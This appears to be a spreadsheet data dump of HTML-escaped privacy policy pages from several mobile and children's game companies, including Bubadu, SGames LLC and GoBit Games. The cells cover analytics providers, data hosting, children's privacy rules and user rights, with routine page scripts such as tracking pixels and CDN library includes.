&lt;p&gt;You may contact SuperAwesome directly at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="daaaa8b3acbbb9a39aa9afaabfa8bbadbfa9b5b7bff4b9b5b7"&gt;[email&amp;#160;protected]&lt;/a&gt; on + 44 203 668 6677, or by post: Privacy Team, SuperAwesome Trading Limited, 22 Long Acre, London WC2E 9LY, United Kingdom.&lt;/p&gt;
&lt;h4&gt;ANALYTICS PROVIDERS&lt;/h4&gt;
&lt;p&gt;Google Analytics for Firebase and Big Query allows us to collect data on the usage of our Apps. We use your data only for the purposes of our internal analytics to improve our Apps and we do not allow sharing of your data with other parties and their products or services.</t>
  </si>
  <si>
    <t>Google Analytics for Firebase collects these data: user_pseudo_id, browser type and settings, operating system, mobile network information, IP Address (which is anonymised before any storage takes place), and crash reports. This data is collected by Google Firebase when the users installs the App from Google Play of App Store. We use Firebase Analytics' own user_pseudo_id, which is based on app install and does not separate one mobile device from another and can not personally identify you.</t>
  </si>
  <si>
    <t>We are using the following Google Analytics for Firebase features: Remote Config., Crash Reporting, Events (about usage of our App in a pseudonymized way), Analytics in general, Firebase Cloud Functions and Firebase Communication Manager. For more information, please see:&lt;br&gt;
&lt;a href="https://firebase.google.com/policies/analytics/"&gt;https://firebase.google.com/policies/analytics/&lt;/a&gt;,&lt;br&gt;
&lt;a href="https://support.google.com/analytics/answer/6004245?hl=en"&gt;https://support.google.com/analytics/answer/6004245?hl=en&lt;/a&gt;,&lt;br&gt;
&lt;a href="https://policies.google.com/technologies/partner-sites"&gt;https://policies.google.com/technologies/partner-sites&lt;/a&gt;,&lt;br&gt;
&lt;a href="https://firebase.google.com/terms/"&gt;https://firebase.google.com/terms/&lt;/a&gt;.
&lt;/p&gt;
&lt;p&gt;We use Google Analytics to collect the Information in order to analyze and improve our Apps.&lt;br&gt;
&lt;a href="https://www.google.com/analytics/terms/us.html"&gt;https://www.google.com/analytics/terms/us.html&lt;/a&gt;&lt;br&gt;
&lt;a href="https://www.google.com/intl/en/policies/privacy/"&gt;https://www.google.com/intl/en/policies/privacy/&lt;/a&gt;
&lt;/p&gt;
&lt;h4&gt;Digital Ocean&lt;/h4&gt;
&lt;p&gt;We use Digital Ocean services to store the data on their servers based in the US. The data transfer provides appropriate safeguards by virtue of Digital Ocean having certified its compliance with the Privacy Shield and shall process such data in compliance with the Privacy Shield.</t>
  </si>
  <si>
    <t>We have entered into a Data processing agreement with Digital Ocean. For more information, please see:
&lt;a href="https://www.digitalocean.com/security/gdpr/"&gt;https://www.digitalocean.com/security/gdpr/&lt;/a&gt;.
 &lt;/p&gt;
&lt;h4&gt;Webserver Providers&lt;/h4&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We use third party Webserver Providers, namely CloudFlare to store your IP address for the purposes of security to help us detect and prevent fraudulent activity. These services may collect your information when you use our services, web applications, and APIs. The information may include but is not limited to IP addresses, location data, Log File, User Agent String, Unique ID, system configuration information, cookies and related technologies, other information about traffic to and from our Apps (collectively, “Log Data”).</t>
  </si>
  <si>
    <t>The Webserver Providers collect and use Log Data to operate, maintain, and improve their Services for the purpose of providing security. For example, Log Data can help us to detect new threats, identify malicious third parties, and provide more robust security protection for our services. Where Webservers Providers use information collected from Resolver Users to operate and improve the Cloudflare Resolver, such as to assist us in our debugging efforts if an issue arises, they will not combine the information collected from DNS queries with any other data in any way that can be used to identify individual end users.</t>
  </si>
  <si>
    <t>Some of the Webserver Providers store or transfer data outside EEA. The data is transferred to countries with a current determination of adequacy, adhering to Binding Corporate Rues, EU-US Privacy Shield or other acceptable manners. Our advertising partners may collect some data.</t>
  </si>
  <si>
    <t>Please see these providers privacy policies for more info: &lt;a href="https://www.cloudflare.com/privacypolicy"&gt;https://www.cloudflare.com/privacypolicy&lt;/a&gt;.
 &lt;/p&gt;
&lt;h4&gt;DISCLOSURE FOR LEGAL PURPOSES&lt;/h4&gt;
&lt;p&gt; We may also disclose information in the following cases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;if required by law, for example to comply with a court order, subpoena, regulation, legal process or other governmental request;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;to exercise or protect the rights, property or personal safety of the Company, our users or others;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;to enforce this privacy statement, including investigation of potential violations thereof;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;upon fulfilling legal requirements of local legislation (for example verifiable parental consent of a legal guardian for child directed apps in the US etc.)</t>
  </si>
  <si>
    <t>in order to supply certain services/information third party might legally request from us&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;to detect, prevent, or otherwise address fraud, security or technical issues;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;if Bubadu is involved in a merger, acquisition, or sale of all or a portion of its assets, you will be notified of any change in ownership or uses of your information via our website;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;to respond to claims that any content published on the Bubadu Apps violates any right of a third party&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;V. YOUR RIGHTS&lt;/h4&gt;
&lt;p&gt; We have adhered to the data minimisation principle and we only collect the data we need for our processing purposes. We anonymize the data on our end so that we can not tie it back to you.&lt;/p&gt;
&lt;h4&gt;DEACTIVATE LOCAL NOTIFICATIONS&lt;/h4&gt;
&lt;p&gt;You can deactivate local notifications by changing the notification settings in accordance with the instructions of the operating system running on the users’ device.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;iOS:&lt;/strong&gt;</t>
  </si>
  <si>
    <t>You will be asked to accept or refuse local notifications after the App is downloaded. If you do not accept, you will not receive local notifications. Please note that if you accept, some mobile phones will allow you to disable notifications later on by using the settings on your mobile phone.</t>
  </si>
  <si>
    <t>To manage notifications on your mobile phone please follow these instructions: Open your Settings menu and tap “Notifications”; Find the Application; Tap on the icon of Application; Manage the “Notifications” option by sliding it OFF or ON.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Android:&lt;/strong&gt; After an Application is downloaded, you will automatically receive local notifications. Some of our Apps offer disabling of local notifications by entering the homepage of the App and choosing the “Settings” option.</t>
  </si>
  <si>
    <t>Here, local notifications can be disabled by choosing the uncheck option ‘’0’’. For other Apps your local notification can be disabled within your mobile phone settings.&lt;/p&gt;
&lt;h4&gt;OPT OUT OF ADS&lt;/h4&gt;
&lt;p&gt;You can opt out of displaying ads by choosing these options ‘’Remove Ads’’ or ‘’Buy Full Version’’ available within the App (a button on home screen) or in the app store.&lt;/p&gt;
&lt;h4&gt;OPT-OUT OF THIRD PARTY PROVIDERS&lt;/h4&gt;
&lt;p&gt;You are always free to opt out of the information collection by Third Party Providers by not logging in or using their services. For example Apple, Google etc. may use your data for the functionalities within the App, should you not want them to do so, please do not log in or use their services.</t>
  </si>
  <si>
    <t>Some of the Third Party Providers store or transfer data outside EEA.&lt;/p&gt;
&lt;h4&gt;RIGHT TO OBJECT AND TO RESTRICTION OF PROCESSING&lt;/h4&gt;
&lt;p&gt;Because we process your data on legitimate interests basis, you have the right to object to our processing as well as the right to restrict our processing namely the marking of stored personal data with the aim of limiting their processing in the future.&lt;/p&gt;
&lt;p&gt; We have limited the amount of data we collect and we don’t use advertising identifiers anymore. We also anonymise/pseudonymise our data processing where feasible.&lt;/p&gt;
&lt;p&gt;When you use our free App version you have the right to object to data processing for advertising by choosing these options ‘’Remove Ads’’ or ‘’Buy Full Version’’ available within the App (as button on homepage) or in the app store.</t>
  </si>
  <si>
    <t>When you choose this option we disable any future advertising and stop sharing and using your data for advertising.&lt;/p&gt;
&lt;p&gt;You will still be shown cross-promo ads, namely ads for our services within our Apps, which means that your Bubadu identifier will only be used for this type of advertising without involving any third parties.&lt;/p&gt;
&lt;p&gt;We will use your country data to show appropriate cross promo ads, but we won’t store it for more than three (3) days.&lt;/p&gt;
&lt;p&gt; Your data will be automatically deleted from our logs within one (1) month and from backup logs within two (2) months.&lt;/p&gt;
&lt;p&gt;Should you not feel comfortable with this lighter version of your data processing, you have the right to object to us using your data for analytics by sending an email to &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="3744424747584543775542555653421954585a"&gt;[email&amp;#160;protected]&lt;/a&gt; or exercise your right to erasure by deleting the app which will also delete all related data.&lt;/p&gt;
&lt;h4&gt;CCPA RIGHTS&lt;/h4&gt;
&lt;p&gt;If you are a California resident, California Consumer Privacy Act (CCPA) may permit you to opt out of the sale of your personal information to third parties (as those terms are defined in the CCPA). CCPA recognizes certain exceptions to the definition of sale, such that not all transfers of personal information are considered sales.</t>
  </si>
  <si>
    <t>For example, transferring information to a "service provider" under the law is not a sale. We are not selling any information to third parties and we don’t allow tracking of data to third parties.&lt;/p&gt;
&lt;h4&gt;Right to access, data portability, copy and rectification&lt;/h4&gt;
&lt;p&gt; We have anonymised your data and we are not able to identify your specific device.</t>
  </si>
  <si>
    <t>For this reason we can offer these rights.&lt;/p&gt;
&lt;p&gt; We do store your IP address which is already available to you on the operating system within your mobile device, but we only use it in case of a security incident. For this reason, we are not able to offer the exercise of this right.&lt;/p&gt;
&lt;p&gt;Should you have any concerns about exercising these rights, please contact us and we will reevaluate our decision.&lt;/p&gt;
&lt;h4&gt;Right to erasure&lt;/h4&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>Should you wish to terminate our services and request the deletion of all data, please uninstall our app. The logs with your data will be automatically deleted within one (1) month and backup logs within two (2) months.&lt;/p&gt;
&lt;h4&gt; Right to file a complaint&lt;/h4&gt;
&lt;p&gt;Should you have any data processing or privacy related questions, please contact our DPO, Primož Furlan by sending an email to: &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="1b686e6b6b74696f5b796e797a7f6e35787476"&gt;[email&amp;#160;protected]&lt;/a&gt; (subject 'DPO'').</t>
  </si>
  <si>
    <t>Should you have any concerns or complaints our DPO is not able to solve, you have the right to lodg</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
  &lt;head&gt;
    &lt;meta charset="UTF-8" /&gt;
    &lt;title&gt;Buddy.ai&lt;/title&gt;
    &lt;link rel="shortcut icon" href="/favicon-16x16.ico" /&gt;
    &lt;link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png" /&gt;
    &lt;link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png" /&gt;
    &lt;link rel="manifest" href="/site.webmanifest" /&gt;
    &lt;meta name="msapplication-TileColor" content="#b880ff"&gt;
    &lt;meta name="theme-color" content="#ffffff"&gt;
    &lt;script&gt;
      ! function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o. DocumentTouch&amp;&amp;c instanceof DocumentTouch)&amp;&amp;(n.className+=t+"touch")}(window,document);
      !</t>
  </si>
  <si>
    <t xml:space="preserve">function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','https://connect.facebook.net/en_US/fbevents.js');
    &lt;/script&gt;
    &lt;script type="module" crossorigin src="/assets/index-a8399f03.js"&gt;&lt;/script&gt;
    &lt;link rel="stylesheet" href="/assets/index-f275b334.css"&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;div id="app"&gt;&lt;/div&gt;
    &lt;script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=63511e45a7e92877b05b7b16" type="text/javascript" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"&gt;&lt;/script&gt;
    &lt;script src="/webflow.js" type="text/javascript"&gt;&lt;/script&gt;
  &lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!doctype html&gt;
&lt;html lang="en"&gt;
  &lt;head&gt;
    &lt;title&gt;Sgames LLC&lt;/title&gt;
    &lt;!-- Required meta tags --&gt;
    &lt;meta charset="utf-8"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"&gt;
    &lt;!-- Bootstrap CSS --&gt;
    &lt;link rel="stylesheet" href="css/bootstrap-grid.min.css" crossorigin="anonymous"&gt;
    &lt;link rel="stylesheet" href="css/bootstrap.min.css"&gt;
    &lt;link rel="stylesheet" href="css/main.css"&gt;
    &lt;link rel="shortcut icon" href="img/favicon.ico"&gt;
    &lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Anonymous+Pro|Josefin+Sans|Schoolbell" rel="stylesheet"&gt;
 &lt;/head&gt;
  &lt;body&gt;
&lt;div class="container"&gt;
 &lt;div class="row"&gt;
     &lt;div class="col-12 privacy-text"&gt;
         &lt;h1 class="text-center" style="margin-top: 60px;"&gt;Privacy Policy&lt;/h1&gt;
         &lt;p lang="en-US"&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
&lt;ol&gt;_x005F_x000D_
&lt;li&gt;_x005F_x000D_
&lt;h3 align="justify"&gt;Introduction.&amp;nbsp;&lt;/h3&gt;_x005F_x000D_
&lt;/li&gt;_x005F_x000D_
&lt;/ol&gt;_x005F_x000D_
&lt;p&gt; This Privacy Policy (the &amp;ldquo;Policy&amp;rdquo;) is for the mobile applications (&amp;ldquo;Applications&amp;rdquo;) operated by SGAMES LLC (&lt;strong&gt;&amp;ldquo;us&amp;rdquo;, &amp;ldquo;our&amp;rdquo;, &amp;ldquo;we&amp;rdquo;&lt;/strong&gt;), a company registered under the laws of Republic of Armenia with a registered address at Buzand 53-55, Yerevan 0010, Republic of Armenia.&lt;/p&gt;_x005F_x000D_
&lt;p&gt; This Privacy Policy explains what personal data is collected when you (&lt;strong&gt;&amp;ldquo;you&amp;rdquo;, &amp;ldquo;User&amp;rdquo;&lt;/strong&gt;) use Applications or Website and how this personal data will be collected, processed and shared.</t>
  </si>
  <si>
    <t>Please read this Privacy Policy carefully before using any of our Applications or Website. This Policy may be updated from time to time and in this case, we will notify you about this.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;BY USING ANY OF APPLICATIONS OR WEBSITE YOU CONFIRM AND ASSERT THAT YOU HAVE READ, UNDERSTAND AND AGREE WITH TERMS OF THIS PRIVACY POLICY.&lt;/p&gt;_x005F_x000D_
&lt;p lang="en-US" align="justify"&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
&lt;ol start="2"&gt;_x005F_x000D_
&lt;li&gt;_x005F_x000D_
&lt;h3 align="justify"&gt;Collection of personal data.&amp;nbsp;&lt;/h3&gt;_x005F_x000D_
&lt;/li&gt;_x005F_x000D_
&lt;/ol&gt;_x005F_x000D_
&lt;p&gt;When you download or use any of our Applications, we do not require you to provide personal data. Meanwhile, we do not collect any personal data or data, which allows identifying you.</t>
  </si>
  <si>
    <t>We do not track your location or IP address.&lt;/p&gt;_x005F_x000D_
&lt;p&gt; We only collect nonpersonal data about interactions with Applications. For example, we log taps on certain areas of the Application interface, the features,and content you interact.</t>
  </si>
  <si>
    <t>We collect this data for operation and maintenance purposes.&lt;/p&gt;_x005F_x000D_
&lt;p&gt; Our Applications do not use any cookies or other tracking tools.&lt;/p&gt;_x005F_x000D_
&lt;p&gt; We may collect personal data when you voluntarily provide it to us when contacting us through Website or by sending e-mail to sgamesllc@gmail.com.</t>
  </si>
  <si>
    <t>In such case, personal data is collected only for the purpose of support, shall not be transferred or disclosed by us (except for disclosure to our service providers or authorities).&lt;/p&gt;_x005F_x000D_
&lt;p lang="en-US" align="justify"&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
&lt;ol start="3"&gt;_x005F_x000D_
&lt;li&gt;_x005F_x000D_
&lt;h3 align="justify"&gt;Children personal data.&amp;nbsp;&lt;/h3&gt;_x005F_x000D_
&lt;/li&gt;_x005F_x000D_
&lt;/ol&gt;_x005F_x000D_
&lt;p&gt;When it comes to the collection of personal information from children from the United States under the age of 13 years old, the Children&amp;rsquo;s Online Privacy Protection Act (COPPA) becomes effective. The Federal Trade Commission, United States&amp;rsquo; consumer protection agency, enforces the COPPA Rule, which states what websites, online services, and mobile applications must do to protect children&amp;rsquo;s privacy and safety online. Meanwhile, European Union Regulation 2016/679 General Data Protection Regulation of the European Parliament Commission (GDPR) applies to personal data of children from the EEA member countries and prohibits collection and processing of personal data of children under 14 years of age.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Our Applications and Website comply with the aforementioned regulations.</t>
  </si>
  <si>
    <t>We do not knowingly collect, process, or store personal data from children under the age of 14 years old through our Applications or Website.&lt;/p&gt;_x005F_x000D_
&lt;p&gt; In the event that you contact us through Website or e-mail and identify yourself as a person under the age of 14 years old, we will not collect, store or use personal data provided, and will delete in a secure manner, any such personal data.&lt;/p&gt;_x005F_x000D_
&lt;p lang="en-US"&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
&lt;ol start="4"&gt;_x005F_x000D_
&lt;li&gt;_x005F_x000D_
&lt;h3 align="justify"&gt;Third party links.&lt;/h3&gt;_x005F_x000D_
&lt;/li&gt;_x005F_x000D_
&lt;/ol&gt;_x005F_x000D_
&lt;p align="justify"&gt;Our Applications may, from time to time, describe hyperlinks to third party websites, services, or applications. These links are for your personal convenience and to provide you with further information that may be of interest to you.</t>
  </si>
  <si>
    <t>For the avoidance of doubts, we do not own or govern the use of third party websites, services or applications accessed through third party links. This Privacy Policy or our terms do not regulate all those websites, services or applications. We do not use your personal data to tailor advertising or showing it to you at the relevant time.&lt;/p&gt;_x005F_x000D_
&lt;p align="justify"&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
&lt;ol start="5"&gt;_x005F_x000D_
&lt;li&gt;_x005F_x000D_
&lt;h3 align="justify"&gt;How to contact us.&amp;nbsp;&lt;/h3&gt;_x005F_x000D_
&lt;/li&gt;_x005F_x000D_
&lt;/ol&gt;_x005F_x000D_
&lt;p align="justify"&gt;&lt;span style="font-family: Tahoma, serif;"&gt;&lt;span lang="en-US"&gt;If you have any questions or queries about our Applications, Website, this Privacy Policy, or us, please contact us by sending your message to &lt;/span&gt;&lt;/span&gt;&lt;span style="color: #0563c1;"&gt;&lt;u&gt;&lt;a href="mailto:</t>
  </si>
  <si>
    <t>sgamesllc@gmail.com"&gt;&lt;span style="font-family: Tahoma, serif;"&gt;&lt;span lang="en-US"&gt;sgamesllc@gmail.com&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="font-family: Tahoma, serif;"&gt;&lt;span lang="en-US"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;p lang="en-US"&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
&lt;p lang="en-US"&gt;&lt;span style="font-family: 'Times New Roman', serif;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Tahoma, serif;"&gt;&lt;span style="font-size: small;"&gt;Effective date: 15.09.2019&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
     &lt;/div&gt;
 &lt;/div&gt;
&lt;/div&gt;
    &lt;!-- Optional JavaScript --&gt;
    &lt;!-- jQuery first, then Popper.js, then Bootstrap JS --&gt;
  &lt;!-- jQuery first, then Tether, then Bootstrap JS.</t>
  </si>
  <si>
    <t>--&gt;
  &lt;script src="https://code.jquery.com/jquery-3.1.1.slim.min.js" integrity="sha384-A7FZj7v+d/sdmMqp/nOQwliLvUsJfDHW+k9Omg/a/EheAdgtzNs3hpfag6Ed950n" crossorigin="anonymous"&gt;&lt;/script&gt;
  &lt;script src="https://cdnjs.cloudflare.com/ajax/libs/tether/1.4.0/js/tether.min.js" integrity="sha384-DztdAPBWPRXSA/3eYEEUWrWCy7G5KFbe8fFjk5JAIxUYHKkDx6Qin1DkWx51bBrb" crossorigin="anonymous"&gt;&lt;/script&gt;
  &lt;script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.6/js/bootstrap.min.js" integrity="sha384-vBWWzlZJ8ea9aCX4pEW3rVHjgjt7zpkNpZk+02D9phzyeVkE+jo0ieGizqPLForn" crossorigin="anonymous"&gt;&lt;/script&gt;
  &lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>css2?family=Montserrat:wght@100;300;400;600;700&amp;display=swap" rel="stylesheet"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/cookieconsent.css?v=1681340100"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/master.min.css?v=1681340100"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</si>
  <si>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html&gt;_x005F_x000D_
&lt;!--[if lt IE 7]&gt; &lt;html class="lt-ie9 lt-ie8 lt-ie7"&gt; &lt;! [endif]--&gt;_x005F_x000D_
&lt;!--[if</t>
  </si>
  <si>
    <t>IE 7]&gt;    &lt;html class="lt-ie9 lt-ie8"&gt; &lt;! [endif]--&gt;_x005F_x000D_
&lt;!--[if IE 8]&gt;    &lt;html class="lt-ie9"&gt; &lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;_x005F_x000D_
&lt;!--[if gt IE 8]&gt;&lt;!--&gt; &lt;html&gt; &lt;!--&lt;![endif]--&gt;    _x005F_x000D_
 &lt;head&gt;_x005F_x000D_
&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;_x005F_x000D_
&lt;meta name="viewport" content="width=700"&gt;_x005F_x000D_
_x005F_x000D_
&lt;title&gt;GoBit Games - Privacy&lt;/title&gt;_x005F_x000D_
&lt;link href="style.css?ver=6" rel="stylesheet" type="text/css" /&gt;_x005F_x000D_
&lt;meta name="keywords" content="download games, online games, gobit, gobit games, privacy"&gt;&lt;/meta&gt;_x005F_x000D_
&lt;meta name="description" content="Download Burger Shop and Evil Orbs from GoBit Games.</t>
  </si>
  <si>
    <t>"&gt;&lt;/meta&gt;_x005F_x000D_
&lt;meta name="ROBOTS" content="ALL, INDEX, FOLLOW"&gt;&lt;/meta&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
_x005F_x000D_
&lt;body&gt;_x005F_x000D_
	&lt;div id="maincontent"&gt;_x005F_x000D_
		&lt;a href="index.html" title="GoBit Games" target="_self"&gt;&lt;img id="mainlogo" src="images/logo.gif" /&gt;&lt;/a&gt;_x005F_x000D_
		&lt;div id="mainredbox"&gt;_x005F_x000D_
			&lt;div id="maincurve1"&gt;&lt;/div&gt;&lt;div id="maincurve2"&gt;&lt;/div&gt;&lt;div id="maincurve3"&gt;&lt;/div&gt;&lt;div id="maincurve4"&gt;&lt;/div&gt;_x005F_x000D_
			&lt;img id="mainburgerbottop" src="images/burgerbot_top.png" /&gt;			_x005F_x000D_
			&lt;img id="mainburgerbottext" src="images/burgerbot_PrivacyPolicy_text.png" /&gt;			_x005F_x000D_
			_ x000D_
			&lt;table id="mainmenu"&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt; &lt;!-- *** Main Menu *** --&gt;_x005F_x000D_
			&lt;td id="mainmenu1"&gt;&lt;a class="toplink" href="index.html"&gt;Home&lt;/a&gt;&lt;/td&gt;_x005F_x000D_
			&lt;td id="mainmenu2"&gt;&lt;a class="toplink" href="games.html"&gt;Games&lt;/a&gt;&lt;/td&gt;_x005F_x000D_
			&lt;td id="mainmenu2"&gt;&lt;a class="toplink" href="support.html"&gt;Support&lt;/a&gt;&lt;/td&gt;_x005F_x000D_
			&lt;td id="mainmenu2"&gt;&lt;a class="toplink" href="about.html"&gt;About Us&lt;/a&gt;&lt;/td&gt;_x005F_x000D_
			&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;_x005F_x000D_
_x005F_x000D_
			&lt;div id="mainheading"&gt;Privacy Policy&lt;/div&gt;&lt;br/&gt; &lt;!--</t>
  </si>
  <si>
    <t>**** Privacy **** ---&gt;_x005F_x000D_
			&lt;div class="maintext"&gt;_x005F_x000D_
				 Your privacy is important to us.&lt;br&gt;&lt;br&gt;_x005F_x000D_
_x005F_x000D_
				 In your use of our games, services and websites ("Services"), we may collect certain data as _x005F_x000D_
				outlined below.</t>
  </si>
  <si>
    <t>If you do not agree to our policies or license agreements, you may cease using our Services.&lt;br&gt;&lt;br&gt;_x005F_x000D_
_ x000D_
				&lt;ul class="jennylist"&gt;_x005F_x000D_
				&lt;li&gt;&lt;a href="privacy/privacy_pc.html"&gt;PC and Mac Games&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
				&lt;li&gt;&lt;a href="privacy/privacy_mobile.html"&gt;Mobile Games&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
				&lt;/ul&gt;				 _ x000D_
				_x005F_x000D_
				&lt;br&gt;_x005F_x000D_
				In the process of using our Services, (such as purchasing a game, subscribing to a newsletter or filling out _x005F_x000D_
				a support request form), you may also supply personally identifiable information.</t>
  </si>
  <si>
    <t>This kind of information that _x005F_x000D_
				you may provide to us is only used for the purposes of using our Services, such as completing an order, delivering _x005F_x000D_
				a newsletter or replying to emails or support requests.&lt;br&gt;&lt;br&gt;_x005F_x000D_
_x005F_x000D_
				 As on many web sites, the site editor may also automatically receive general _x005F_x000D_
				information that is contained in server log files such as your IP address.&lt;br&gt;&lt;br&gt;_x005F_x000D_
	_x005F_x000D_
				We never use or share personally identifiable information that you may provide to us in _x005F_x000D_
				any way except in the ways listed above.&lt;br&gt;&lt;br&gt;_x005F_x000D_
_ x000D_
				Changes may be made to our privacy policy from time to time, and these changes will be posted to our _x005F_x000D_
				site.</t>
  </si>
  <si>
    <t xml:space="preserve">Your continued use of our Services after we post a new version of our privacy policy is deemed as _x005F_x000D_
				your acceptance of the modified terms.&lt;br&gt;&lt;br&gt;_x005F_x000D_
				_ x000D_
				Questions about this policy can be directed to &lt;a href="support.html"&gt;customer support&lt;/a&gt;._x005F_x000D_
			&lt;/div&gt; &lt;!-- privacytext --&gt;_x005F_x000D_
			_x005F_x000D_
		&lt;/div&gt; &lt;!-- mainredbox --&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
		&lt;table id="mainfooter" border="0"&gt;&lt;tr&gt;&lt;!-- **** Footer **** --&gt;_x005F_x000D_
		&lt;td&gt;GoBit Games &amp;copy; 2023 &amp;nbsp;|&amp;nbsp; &lt;a href="privacy.html"&gt;Privacy policy&lt;/a&gt;&lt;/td&gt;_x005F_x000D_
		</t>
  </si>
  <si>
    <t>&lt;/tr&gt;&lt;/table&gt; &lt;!-- mainfooter --&gt;_x005F_x000D_
_x005F_x000D_
	&lt;/div&gt; &lt;!-- maincontent --&gt;_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
						_x005F_x000D_
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
  &lt;meta charset='utf-8'&gt;
  &lt;meta name="viewport" content="width=device-width, initial-scale=1" id="wixDesktopViewport" /&gt;
  &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
  &lt;meta name="generator" content="Wix.com Website Builder"/&gt;
  &lt;link rel="icon" sizes="192x192" href="https://static.parastorage.com/client/pfavico.ico"&gt;
  &lt;link rel="shortcut icon" href="https://static.parastorage.com/client/pfavico.ico" type="image/x-icon"/&gt;
  &lt;link rel="apple-touch-icon" href="https://static.parastorage.com/client/pfavico.ico" type="image/x-icon"/&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>Safari Pinned Tab Icon --&gt;
  &lt;!-- &lt;link rel="mask-icon" href="https://static.parastorage.com/client/pfavico.ico"&gt; --&gt;
  &lt;!-- Legacy Polyfills --&gt;
  &lt;script nomodule="" src="https://static.parastorage.com/unpkg/core-js-bundle@3.2.1/minified.js"&gt;&lt;/script&gt;
  &lt;script nomodule="" src="https://static.parastorage.com/unpkg/focus-within-polyfill@5.0.9/dist/focus-within-polyfill.js"&gt;&lt;/script&gt;
  &lt;script nomodule="" src="https://polyfill.io/v3/polyfill.min.js?features=fetch"&gt;&lt;/script&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>Performance API Polyfills --&gt;
  &lt;script&gt;
  (function () {
    var noop = function noop() {};
    if ("performance" in window === false) {
      window.performance = {};
    }
    window.performance.mark = performance.mark || noop;
    window.performance.measure = performance.measure || noop;
    if ("now" in window.performance === false) {
      var nowOffset = Date.now();
      if (performance.timing &amp;&amp; performance.timing.navigationStart) {
        nowOffset = performance.timing.navigationStart;
      }
      window.performance.now = function now() {
        return Date.now() - nowOffset;
      };
    }
  })();
  &lt;/script&gt;
  &lt;!-- Globals Definitions --&gt;
  &lt;script&gt;
    (function () {
      var now = Date.now()
      window.initialTimestamps = {
        initialTimestamp: now,
        initialRequestTimestamp: Math.round(performance.timeOrigin ?</t>
  </si>
  <si>
    <t>performance.timeOrigin : now - performance.now())
      }
      window.thunderboltTag = "libs-releases-GA-local"
      window.thunderboltVersion = "1.12039.0"
    })();
  &lt;/script&gt;
  &lt;!-- registry runtime --&gt;
  &lt;!-- Sentry --&gt;
  &lt;script id="sentry"&gt;
